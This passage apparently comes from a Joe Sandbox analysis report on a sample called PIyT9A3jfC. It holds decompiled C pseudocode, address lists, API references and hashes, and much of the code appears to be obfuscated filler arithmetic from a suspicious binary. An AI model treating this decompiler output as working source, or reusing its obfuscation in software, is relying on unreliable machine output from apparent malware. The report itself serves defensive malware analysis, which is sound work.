                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a8 + 0x24)) =  *((intOrPtr*)(_a8 + 0x38)) +  *((intOrPtr*)(_a8 + 0xfc)) +  *((intOrPtr*)(_a8 + 0x24)) + 0x787;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v24 + 0x2628;
                                                                                                                                                                                                                                                                      			}
















                                                                                                                                                                                                                                                                      0x01195eae
                                                                                                                                                                                                                                                                      0x01195eba
                                                                                                                                                                                                                                                                      0x01195ec6
                                                                                                                                                                                                                                                                      0x01195ecc
                                                                                                                                                                                                                                                                      0x01195ed8
                                                                                                                                                                                                                                                                      0x01195ee4
                                                                                                                                                                                                                                                                      0x01195ef2
                                                                                                                                                                                                                                                                      0x01195eff
                                                                                                                                                                                                                                                                      0x01195f0c
                                                                                                                                                                                                                                                                      0x01195f0f
                                                                                                                                                                                                                                                                      0x01195f11
                                                                                                                                                                                                                                                                      0x01195f1e
                                                                                                                                                                                                                                                                      0x01195f1e
                                                                                                                                                                                                                                                                      0x01195f2a
                                                                                                                                                                                                                                                                      0x01195f2a
                                                                                                                                                                                                                                                                      0x01195f38
                                                                                                                                                                                                                                                                      0x01195f4a
                                                                                                                                                                                                                                                                      0x01195f82
                                                                                                                                                                                                                                                                      0x01195f90
                                                                                                                                                                                                                                                                      0x01195fa8
                                                                                                                                                                                                                                                                      0x01195fbd
                                                                                                                                                                                                                                                                      0x01195fc0
                                                                                                                                                                                                                                                                      0x01195fcb
                                                                                                                                                                                                                                                                      0x01195fd6
                                                                                                                                                                                                                                                                      0x01195f8d
                                                                                                                                                                                                                                                                      0x01195f8d
                                                                                                                                                                                                                                                                      0x01195f4c
                                                                                                                                                                                                                                                                      0x01195f74
                                                                                                                                                                                                                                                                      0x01195f74
                                                                                                                                                                                                                                                                      0x01195f4a
                                                                                                                                                                                                                                                                      0x01195fe9

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(01198BBD,?,?,01198BBD,?,?,?,?,?,?), ref: 01195FD6
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                      • Opcode ID: 630c65d8cbe87af5eb5ac7e06d99c4ff210bf2076f4d67c48e30e0e1c6fc205c
                                                                                                                                                                                                                                                                      • Instruction ID: 8c147f753eba4478e1c1bdc891b8611c30fc0c6fa995a9cbabdff74788f09e00
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 630c65d8cbe87af5eb5ac7e06d99c4ff210bf2076f4d67c48e30e0e1c6fc205c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A412D70A00109DFDF18CF98D594AADB7B2FF44304F14C16AE929AB385DB34AA51CF45
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118C777() {
                                                                                                                                                                                                                                                                      				signed int _t3;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t3 = GetProcessHeap();
                                                                                                                                                                                                                                                                      				 *0x121e1b0 = _t3;
                                                                                                                                                                                                                                                                      				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x0118c777
                                                                                                                                                                                                                                                                      0x0118c77f
                                                                                                                                                                                                                                                                      0x0118c787

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                                                                      • Opcode ID: 03c50f0b47a6b8a5ee01b3cdfc9e154d35f39d1152657e587c8938bbce8ddc23
                                                                                                                                                                                                                                                                      • Instruction ID: efa6876868a294b7aa162ae984489bae9a3f1f4b61ecca8d2c9b7ca2de27b6d3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03c50f0b47a6b8a5ee01b3cdfc9e154d35f39d1152657e587c8938bbce8ddc23
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35A01230500241CB47208E35A90820835A8750028030544285420C1144EB2444404700
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                                                                                      			E01196710() {
                                                                                                                                                                                                                                                                      				signed int _t524;
                                                                                                                                                                                                                                                                      				signed int _t528;
                                                                                                                                                                                                                                                                      				intOrPtr _t530;
                                                                                                                                                                                                                                                                      				intOrPtr _t570;
                                                                                                                                                                                                                                                                      				signed int _t584;
                                                                                                                                                                                                                                                                      				intOrPtr _t600;
                                                                                                                                                                                                                                                                      				signed int _t603;
                                                                                                                                                                                                                                                                      				intOrPtr _t607;
                                                                                                                                                                                                                                                                      				intOrPtr _t612;
                                                                                                                                                                                                                                                                      				signed int _t618;
                                                                                                                                                                                                                                                                      				intOrPtr _t624;
                                                                                                                                                                                                                                                                      				intOrPtr _t629;
                                                                                                                                                                                                                                                                      				short _t653;
                                                                                                                                                                                                                                                                      				signed int _t659;
                                                                                                                                                                                                                                                                      				signed int _t660;
                                                                                                                                                                                                                                                                      				intOrPtr _t663;
                                                                                                                                                                                                                                                                      				signed short _t673;
                                                                                                                                                                                                                                                                      				intOrPtr _t716;
                                                                                                                                                                                                                                                                      				signed int _t739;
                                                                                                                                                                                                                                                                      				signed int _t740;
                                                                                                                                                                                                                                                                      				intOrPtr _t747;
                                                                                                                                                                                                                                                                      				signed int _t758;
                                                                                                                                                                                                                                                                      				intOrPtr _t781;
                                                                                                                                                                                                                                                                      				intOrPtr _t801;
                                                                                                                                                                                                                                                                      				intOrPtr _t804;
                                                                                                                                                                                                                                                                      				signed int _t824;
                                                                                                                                                                                                                                                                      				signed int _t828;
                                                                                                                                                                                                                                                                      				intOrPtr _t848;
                                                                                                                                                                                                                                                                      				signed int _t862;
                                                                                                                                                                                                                                                                      				signed int _t936;
                                                                                                                                                                                                                                                                      				intOrPtr _t952;
                                                                                                                                                                                                                                                                      				intOrPtr _t953;
                                                                                                                                                                                                                                                                      				intOrPtr _t955;
                                                                                                                                                                                                                                                                      				intOrPtr* _t958;
                                                                                                                                                                                                                                                                      				void* _t960;
                                                                                                                                                                                                                                                                      				void* _t961;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t958 = _t960 - 0x60;
                                                                                                                                                                                                                                                                      				_t961 = _t960 - 0xf4;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 - 8)) = 0xfcf -  *0x121df30;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + ( *0x121dee6 & 0x000000ff) * 4));
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 + 8)) = 0x207b;
                                                                                                                                                                                                                                                                      				_t659 =  *0x121df08; // 0x0
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + _t659 * 4));
                                                                                                                                                                                                                                                                      				_t660 =  *0x121df14; // 0x0
                                                                                                                                                                                                                                                                      				 *(_t958 + 4) =  *( *((intOrPtr*)(_t958 + 0x78)) + _t660 * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x38) =  *0x121df2c & 0x0000ffff &  *0x121df14;
                                                                                                                                                                                                                                                                      				_t663 =  *0x121df20; // 0x0
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 - 0x90)) =  *((intOrPtr*)(_t663 + 0xa0 +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                                      				 *( *(_t958 + 0x70)) =  *( *(_t958 + 0x70)) + 1;
                                                                                                                                                                                                                                                                      				_t801 =  *0x121dedc; // 0x0
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x44) =  *(_t801 +  *( *(_t958 + 0x70)) * 4) |  *0x121ded8;
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x54) = ( *0x121dee4 & 0x000000ff) *  *( *((intOrPtr*)(_t958 + 0x7c)) + 0x1648);
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 + 0x40)) = 0x677;
                                                                                                                                                                                                                                                                      				_t804 =  *0x121df0c; // 0x0
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x10) =  *(_t804 + 0x4e24) / 0xbef;
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x3c) = ( *( *((intOrPtr*)(_t958 + 0x78)) + 0x40 + ( *( *(_t958 + 0x70)) << 2) * 2) & 0x0000ffff) + 0x136d;
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x4c) = ( *(_t958 + 0x70))[0x319] ^ 0x00000550;
                                                                                                                                                                                                                                                                      				_t673 =  *0x121def0; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121def0 = _t673 - 1;
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x5b) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) + ( *0x121def0 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                                      				 *(_t958 - 0x94) = ( *(_t958 + 0x70))[0xdab];
                                                                                                                                                                                                                                                                      				 *_t958 = 0x8b2;
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x48) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0x74 +  *( *(_t958 + 0x70)) * 4) % 0x1a70;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 - 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + 0x19d0));
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x5c) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0x1c +  *(_t958 + 0x48) * 4);
                                                                                                                                                                                                                                                                      				while( *(_t958 + 0x5c) <  *((intOrPtr*)( *(_t958 + 0x38) + ( *( *(_t958 + 0x3c)) & 0x000000ff) * 4))) {
                                                                                                                                                                                                                                                                      					asm("cdq");
                                                                                                                                                                                                                                                                      					 *( *((intOrPtr*)(_t958 + 0x40)) +  *(_t958 + 0x5c) * 4) = 0xf32 %  *( *((intOrPtr*)(_t958 + 0x40)) +  *(_t958 + 0x5c) * 4);
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x10) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      					 *(_t958 - 0xc) =  *( *(_t958 + 0x44) + 0x40 +  *0x121dee0 * 3 * 2) & 0x0000ffff ^  *( *(_t958 + 0x4c) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                                      					 *( *((intOrPtr*)(_t958 - 4)) +  *( *(_t958 + 0x70)) * 4) = E01197E80( *(_t958 - 0x10),  *(_t958 - 0xc));
                                                                                                                                                                                                                                                                      					_t739 =  *0x121dee8; // 0x0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) + _t739 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                                      					_t740 =  *0x121dee8; // 0x0
                                                                                                                                                                                                                                                                      					 *0x121dee8 = _t740 + 1;
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x28) =  *(_t958 + 0x5b) & 0x000000ff;
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x5b) =  *(_t958 + 0x5b) + 1;
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x2c) =  *(_t958 + 0x5c) *  *( *((intOrPtr*)(_t958 + 0x7c)) + (( *( *(_t958 + 0x54)) & 0x000000ff) << 2) * 4);
                                                                                                                                                                                                                                                                      					_t600 =  *0x121df20; // 0x0
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x28) =  *(_t600 + 0x1c +  *(_t958 + 0x5c) * 4) | 0x000017a7;
                                                                                                                                                                                                                                                                      					_t747 =  *0x121deec; // 0x0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t958 - 0x24)) =  *((intOrPtr*)(_t747 + 0x28cc));
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x20) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      					_t603 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x1c) = _t603 |  *( *(_t958 + 0x38) + ( *(_t958 + 0x48) << 2) * 4);
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x18) =  *( *((intOrPtr*)(_t958 + 0x78)) +  *(_t958 + 0x5c) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x2c) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x34)) + 0x1624));
                                                                                                                                                                                                                                                                      					_t607 =  *0x121df04; // 0x0
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x30) =  *(_t607 + ( *0x121def4 & 0x0000ffff) * 4) ^ 0x00000668;
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x14) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      					_t612 = E01195000( *(_t958 + 0x28) & 0x0000ffff,  *(_t958 - 0x2c),  *(_t958 - 0x28),  *((intOrPtr*)(_t958 - 0x24)),  *(_t958 - 0x20),  *(_t958 - 0x1c),  *(_t958 - 0x18),  *(_t958 + 0x2c) & 0x0000ffff,  *(_t958 + 0x30) & 0x0000ffff,  *(_t958 - 0x14));
                                                                                                                                                                                                                                                                      					_t758 =  *0x121df30; // 0x0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x40)) + _t758 * 4)) = _t612;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t958 - 0x34)) = 0xe55;
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x30) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      					( *(_t958 + 0x3c))[( *( *(_t958 + 0x3c)) & 0x000000ff) + 0x1f] = E01197E80( *((intOrPtr*)(_t958 - 0x34)),  *(_t958 - 0x30));
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t958 - 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 8)) +  *( *(_t958 + 0x70)) * 3 * 4));
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x40) =  *(_t958 + 0x68) *  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x68) =  *(_t958 + 0x68) + 1;
                                                                                                                                                                                                                                                                      					_t618 =  *0x121dee0; // 0x0
                                                                                                                                                                                                                                                                      					asm("cdq");
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x3c) = _t618 %  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x38) = ( *(_t958 + 0x70))[ *( *(_t958 + 0x54)) & 0x000000ff];
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x54) =  *(_t958 + 0x54) - 1;
                                                                                                                                                                                                                                                                      					_push( *(_t958 - 0x38));
                                                                                                                                                                                                                                                                      					_push( *(_t958 - 0x3c));
                                                                                                                                                                                                                                                                      					_push( *(_t958 - 0x40));
                                                                                                                                                                                                                                                                      					_push( *((intOrPtr*)(_t958 - 0x44)));
                                                                                                                                                                                                                                                                      					_t624 = E01184250();
                                                                                                                                                                                                                                                                      					_t961 = _t961 + 0x48;
                                                                                                                                                                                                                                                                      					 *0x121df38 = _t624;
                                                                                                                                                                                                                                                                      					 *( *(_t958 + 0x10) +  *(_t958 + 0x5c) * 2) = ( *( *_t958 +  *( *(_t958 + 0x70)) + 0x14) & 0x000000ff) - ( *( *(_t958 + 0x10) +  *(_t958 + 0x5c) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                      					_t629 =  *0x121df34; // 0x0
                                                                                                                                                                                                                                                                      					if(_t629 >=  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) +  *(_t958 + 0x5c) * 4)) ||  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + 0x2c +  *(_t958 + 0x5c) * 4)) >= ( *(_t958 + 0x5b) & 0x000000ff)) {
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + 8 +  *( *(_t958 + 0x70)) * 3 * 4)) >  *(_t958 + 0x5c)) {
                                                                                                                                                                                                                                                                      							 *( *(_t958 + 0x44) +  *(_t958 + 0x5c) * 2) = ( *0x121dee5 & 0x000000ff &  *(_t958 + 0x48)) + ( *( *(_t958 + 0x44) +  *(_t958 + 0x5c) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                      							 *( *((intOrPtr*)(_t958 + 0x40)) + 0x5c + ( *(_t958 + 0x5c) << 2) * 4) =  *( *((intOrPtr*)(_t958 - 8)) +  *0x121df08) & 0x000000ff;
                                                                                                                                                                                                                                                                      							 *0x121dee4 =  *( *(_t958 + 0x4c) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t958 - 0x58)) =  *(_t958 + 0x5c) -  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      							 *(_t958 - 0x54) =  *( *(_t958 + 4) + 2 +  *( *(_t958 + 0x70)) * 2) & 0x0000ffff &  *( *(_t958 + 0x4c) + 0x7c +  *(_t958 + 0x5c) * 4);
                                                                                                                                                                                                                                                                      							 *(_t958 + 0x70) =  *(_t958 + 0x70) - 4;
                                                                                                                                                                                                                                                                      							_t781 =  *0x121def8; // 0x0
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t958 - 0x50)) = _t781;
                                                                                                                                                                                                                                                                      							 *(_t958 - 0x4c) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0xc +  *( *(_t958 + 0x70)) * 4) %  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      							_t936 =  *0x121df18; // 0x0
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t958 - 0x48)) = _t936 +  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                      							 *(_t958 + 0x24) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 8)) +  *(_t958 + 0x5c) * 4));
                                                                                                                                                                                                                                                                      							 *( *(_t958 + 0x70)) =  *( *(_t958 + 0x70)) - 1;
                                                                                                                                                                                                                                                                      							_t653 = E01196F90( *((intOrPtr*)(_t958 - 0x58)),  *(_t958 - 0x54),  *((intOrPtr*)(_t958 - 0x50)),  *(_t958 - 0x4c),  *((intOrPtr*)(_t958 - 0x48)),  *(_t958 + 0x24) & 0x0000ffff);
                                                                                                                                                                                                                                                                      							_t961 = _t961 + 0x18;
                                                                                                                                                                                                                                                                      							 *((short*)( *((intOrPtr*)(_t958 + 0x34)) +  *( *(_t958 + 0x70)) * 2)) = _t653;
                                                                                                                                                                                                                                                                      							 *0x121ded8 = ( *( *(_t958 + 0x44) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 2) & 0x0000ffff) *  *(_t958 + 0x5c) | ( *(_t958 + 0x70))[0xe97] |  *0x121ded8;
                                                                                                                                                                                                                                                                      							 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x5c) =  *(_t958 + 0x5c) + 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x50) =  *( *((intOrPtr*)(_t958 + 0xc)) +  *0x121df08) & 0x000000ff;
                                                                                                                                                                                                                                                                      				while( *(_t958 + 0x50) != ( *(_t958 + 0x5b) & 0x000000ff)) {
                                                                                                                                                                                                                                                                      					_t952 =  *0x121df1c; // 0x0
                                                                                                                                                                                                                                                                      					asm("cdq");
                                                                                                                                                                                                                                                                      					asm("cdq");
                                                                                                                                                                                                                                                                      					 *( *(_t958 + 0x54) +  *(_t958 + 0x50)) = (0x0000166f /  *(_t952 + 0x10 + ( *0x121def0 & 0x0000ffff) * 4) ^  *(_t958 + 0x50)) / ( *( *((intOrPtr*)(_t958 + 0xc)) +  *(_t958 + 0x50)) & 0x000000ff) ^  *( *(_t958 + 0x54) +  *(_t958 + 0x50)) & 0x000000ff;
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x6c) =  *( *(_t958 + 4) +  *( *(_t958 + 0x70)) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t958 - 0x68)) = 0xedb;
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x64) =  *(_t958 + 0x50);
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t958 - 0x60)) = ( *( *(_t958 + 0x10) + 0x1072) & 0x0000ffff) +  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + ( *(_t958 + 0x50) << 2) * 4));
                                                                                                                                                                                                                                                                      					 *(_t958 - 0x5c) =  *( *((intOrPtr*)(_t958 + 0x74)) + 0x58 +  *(_t958 + 0x50) * 4) |  *0x121dee0;
                                                                                                                                                                                                                                                                      					_t862 =  *0x121df10; // 0x0
                                                                                                                                                                                                                                                                      					 *0x121df10 = _t862 + 1;
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x20) = ( *( *((intOrPtr*)(_t958 + 0x34)) + 0x15d4) & 0x0000ffff) *  *0x121df10;
                                                                                                                                                                                                                                                                      					_t570 = E01196F90( *(_t958 - 0x6c),  *((intOrPtr*)(_t958 - 0x68)),  *(_t958 - 0x64),  *((intOrPtr*)(_t958 - 0x60)),  *(_t958 - 0x5c),  *(_t958 + 0x20) & 0x0000ffff);
                                                                                                                                                                                                                                                                      					_t961 = _t961 + 0x18;
                                                                                                                                                                                                                                                                      					 *0x121df38 = _t570;
                                                                                                                                                                                                                                                                      					_t953 =  *0x121df04; // 0x0
                                                                                                                                                                                                                                                                      					_t716 =  *0x121df04; // 0x0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t716 +  *0x121df30 * 3 * 4)) =  *( *((intOrPtr*)(_t958 + 0x7c)) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4) -  *((intOrPtr*)(_t953 +  *0x121df30 * 3 * 4));
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                                      					( *(_t958 + 0x70))[ *(_t958 + 0x48)] = ( *0x121df2c & 0x0000ffff) *  *( *((intOrPtr*)(_t958 + 0x74)) +  *(_t958 + 0x50) * 4) - ( *( *_t958 +  *(_t958 + 0x48) + 0xe) & 0x000000ff) |  *( *((intOrPtr*)(_t958 - 4)) +  *( *(_t958 + 0x70)) * 4);
                                                                                                                                                                                                                                                                      					_t955 =  *0x121df24; // 0x0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) +  *(_t958 + 0x50) * 4)) = ( *( *((intOrPtr*)(_t958 + 0x7c)) + 0x6790) |  *( *((intOrPtr*)(_t958 + 0x7c)) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4)) /  *(_t955 +  *( *(_t958 + 0x70)) * 4) + ( *0x121dee6 & 0x000000ff);
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x70) =  *(_t958 + 0x70) - 4;
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                                      					_t584 =  *0x121df14; // 0x0
                                                                                                                                                                                                                                                                      					 *0x121ded8 = (_t584 % ( *0x121df2c & 0x0000ffff) +  *(_t958 + 0x50)) /  *0x121ded8;
                                                                                                                                                                                                                                                                      					 *(_t958 + 0x50) =  *(_t958 + 0x50) + 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t824 =  *0x121df18; // 0x0
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x18) = _t824 + 0xe02;
                                                                                                                                                                                                                                                                      				_t524 =  *0x121df18; // 0x0
                                                                                                                                                                                                                                                                      				 *0x121df18 = _t524 - 1;
                                                                                                                                                                                                                                                                      				 *(_t958 - 0x88) =  *( *((intOrPtr*)(_t958 + 0x78)) +  *(_t958 + 0x48) * 2) & 0x1c64;
                                                                                                                                                                                                                                                                      				_t528 =  *0x121df18; // 0x0
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				 *(_t958 - 0x84) = _t528 % 0x1c97;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 - 0x80)) = 0x11b6;
                                                                                                                                                                                                                                                                      				_t828 =  *0x121defc; // 0x0
                                                                                                                                                                                                                                                                      				_t530 =  *0x121df1c; // 0x0
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 - 0x7c)) =  *((intOrPtr*)(_t530 + _t828 * 4));
                                                                                                                                                                                                                                                                      				 *(_t958 - 0x78) =  *( *(_t958 + 0x44) + ( *0x121def4 & 0x0000ffff) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t958 - 0x74)) = 0x3cb -  *((intOrPtr*)( *(_t958 + 0x4c) + ( *( *(_t958 + 0x3c)) & 0x000000ff) * 4));
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x14) =  *( *((intOrPtr*)(_t958 + 0xc)) + ( *0x121def4 & 0x0000ffff)) & 0x000000ff;
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x1c) = ( *( *((intOrPtr*)(_t958 - 8)) +  *0x121dee0) & 0x000000ff) + 0x324;
                                                                                                                                                                                                                                                                      				 *(_t958 - 0x70) =  *(_t958 + 0x68);
                                                                                                                                                                                                                                                                      				 *((char*)( *(_t958 + 0x54) +  *( *(_t958 + 0x4c)))) = E01195000( *(_t958 + 0x18) & 0x0000ffff,  *(_t958 - 0x88),  *(_t958 - 0x84),  *((intOrPtr*)(_t958 - 0x80)),  *((intOrPtr*)(_t958 - 0x7c)),  *(_t958 - 0x78),  *((intOrPtr*)(_t958 - 0x74)),  *(_t958 + 0x14) & 0x0000ffff,  *(_t958 + 0x1c) & 0x0000ffff,  *(_t958 - 0x70));
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)( *(_t958 + 0x38) +  *( *(_t958 + 0x70)) * 4)) =  *((intOrPtr*)( *(_t958 + 0x38) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 3 * 4));
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)( *(_t958 + 0x4c) + 0x84 +  *( *(_t958 + 0x70)) * 4)) = ( *0x121def4 & 0x0000ffff) -  *((intOrPtr*)( *(_t958 + 0x4c) + 0x84 +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                                      				 *(_t958 + 0x70) =  &(( *(_t958 + 0x70))[1]);
                                                                                                                                                                                                                                                                      				_t848 =  *0x121df20; // 0x0
                                                                                                                                                                                                                                                                      				 *(_t958 - 0x8c) =  *( *((intOrPtr*)(_t958 + 0x34)) + ( *( *(_t958 + 0x70)) << 2) * 2) & 0x0000ffff &  *(_t848 + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
